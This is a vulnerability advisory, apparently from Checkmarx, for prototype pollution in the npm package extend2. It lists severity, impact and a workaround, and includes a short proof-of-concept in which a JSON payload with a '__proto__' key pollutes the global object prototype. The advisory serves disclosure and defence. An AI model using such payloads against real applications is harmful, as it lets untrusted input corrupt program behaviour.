Prototype Pollution In Extend2: CX-2021-4800

Severity

Severity: 5.6 - Medium Severity

Advisory Timeline Summary
Affected versions of extend2 (npm) are vulnerable to prototype pollution via the extend function.

Product

All versions of extend2 (npm).

Impact

If untrusted data reaches one of the affected functions, prototype pollution can be achieved. The impact will depend on the application.

Steps To Reproduce

const extend = require('extend2');
a = {'a':1};
extend(true, {}, a, JSON.parse('{"__proto__":{"polluted":1}}'));
console.log({}.polluted);

Expected Result:

1 will be printed to the console.

Remediation

Currently no fix has been released. As a workaround, avoid passing untrusted inputs to the vulnerable function.

Properties

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: Low

Integrity: Low

Availability: Low

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. NPM Package